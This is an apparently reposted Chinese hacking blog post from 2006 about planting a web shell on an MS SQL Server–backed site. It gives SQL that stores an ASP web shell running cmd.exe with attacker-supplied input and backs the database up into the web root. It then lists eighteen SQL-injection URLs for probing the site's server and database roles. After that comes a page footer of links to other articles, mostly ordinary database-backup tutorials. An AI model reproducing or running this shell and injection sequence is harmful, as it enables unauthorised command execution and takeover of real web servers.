备份SQL数据库得到shell的方法:

转载 2006年05月18日 14:49:00


    动画种这种备份的方法来源于n.e.v.e.r的发明

使用语句为:
use model
create table cmd (str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='虚拟目录的实际物理目录';

 


这个方法对数据库角色的权限要求很低,应当有db_backupoperator权限就可以了。
附上判断数据库权限的语句:(1-8是服务器角色权限,9-18是数据库角色权限判断,具体什么权限你找本书看看吧。
语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_owner'));--
语句10:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_accessadmin'));--
语句11:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_addadmin'));--
语句12:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_addladmin'));-- 
语句13:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_securityadmin'));--
语句14:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_backupoperator'));--
语句15:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_datareader'));--
语句16:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_datawriter'));--
语句17:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_denydatareader'));--
语句18:http://www.xxxxx.com/down/list.asp?id=1 and 1=(SELECT IS_MEMBER('db_denydadawriter'));--     

动画结束语引用n.e.v.e.r的<<Backup a shell>>中的一段原话:
 “本来这也不是什么大不了的东西,但是我写了还没有贴出来的时候,有一天QQ上居然有人神神秘秘地把这篇文章传给了我,隔了不久又有人送了我一个这方面的工具!我好感动哦,5555555~
    我也不追问他们是哪里得来的了,我给过的就几个,总是这样子传出去的吧。反正大家都知道,也没有什么好保留的,于是在黑防四期上骗了点钱,过程就是这样。”

LCX来说两句,好像n.e.v.e.r对这事公开很生气,我再做个动画,哈哈。。。。
其实asp代码写在exe里改后缀也是可以执行的。。。。。

教你如何用SQL备份和还原数据库

 数据库的备份和恢复一、备份数据库1、打开SQL企业管理器,在控制台根目录中依次点开Microsoft SQL Server2、SQL Server组-->双击打开你的服务器-->双击打开数据库目录3...
  • hzyishion
  • hzyishion
  • 2007年02月10日 13:16
  • 25067

SQL Server数据库备份有两种方式

SQL Server数据库备份有两种方式,一种是使用BACKUP DATABASE将数据库文件备份出去,另外一种就是直接拷贝数据库文件mdf和日志文件ldf的方式。下面将主要讨论一下后者的备份与恢复。...
  • fishinhouse
  • fishinhouse
  • 2007年06月13日 09:54
  • 1122

shell语句备份mysql数据库表内容,生成sql文件的tar包

shell语句备份mysql数据库表内容,生成sql文件的tar包
  • high2011
  • high2011
  • 2016年08月08日 12:21
  • 850

mongodb数据库备份和利用shell脚本编写

1、指令备份 MongoDB提供了备份工具,mongodump.exe,在bin目录下,其用法如下: mongodump.exe -h localhost -d database_...
  • fzjlucky
  • fzjlucky
  • 2017年02月17日 15:06
  • 500

一个备份MySQL数据库的简单Shell脚本

Shell脚本是我们写不同类型命令的一种脚本,这些命令在这一个文件中就可以执行。我们也可以逐一敲入命令手动执行。如果我们要使用shell脚本就必须在一开始把这些命令写到一个文本文件中,以后就可以随意反...
  • xiaoxian8023
  • xiaoxian8023
  • 2014年12月31日 23:54
  • 2575

linux下的mysql自动备份shell

一个mysql备份脚本
  • qidizi
  • qidizi
  • 2015年05月06日 19:19
  • 2757

备份数据库存储过程

--备份数据库 CREATE PROC [dbo].[P_DBBACKUP2Path] ( @dbPath NVARCHAR(200) , --备份文件存放路径,最后带/ ...
  • apollokk
  • apollokk
  • 2015年12月14日 10:51
  • 1188

SQL备份所有数据库脚本

技巧要点:使用游标循环读取所有数据库名,然后定义存放路径,最后备份所有数据库到指定存在的本地文件夹中脚本如下:declare @fileName varchar(255) --定义备份文件名变量dec...
  • xqf222
  • xqf222
  • 2014年03月28日 19:09
  • 1287

shell 脚本实现定时备份数据库表

前段时间由于在工作中有同学由于误操作,导致把生产环境的基础信息表删除了,为防止此类问题,决定写一个定时备份基础表的脚本,也正好可以巩固一下linux及shell基础。备份规则为:昨天备份0点、6点、1...
  • lixiaopeng913
  • lixiaopeng913
  • 2016年08月03日 15:28
  • 2530

利用后台SQL查询语句拿webshell

有SQL查询功能 在后台的主页,或者备份什么的,可以得到网站的物理路径,这里我没有传马,直接点击了备份数据库,重点是得到物理路径,后台主页,或者各种爆物理路径,还要看运气和自由发挥。 以下拿web...
  • god_7z1
  • god_7z1
  • 2014年11月30日 01:13
  • 575
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:备份SQL数据库得到shell的方法:
举报原因:
原因补充:

(最多只允许输入30个字)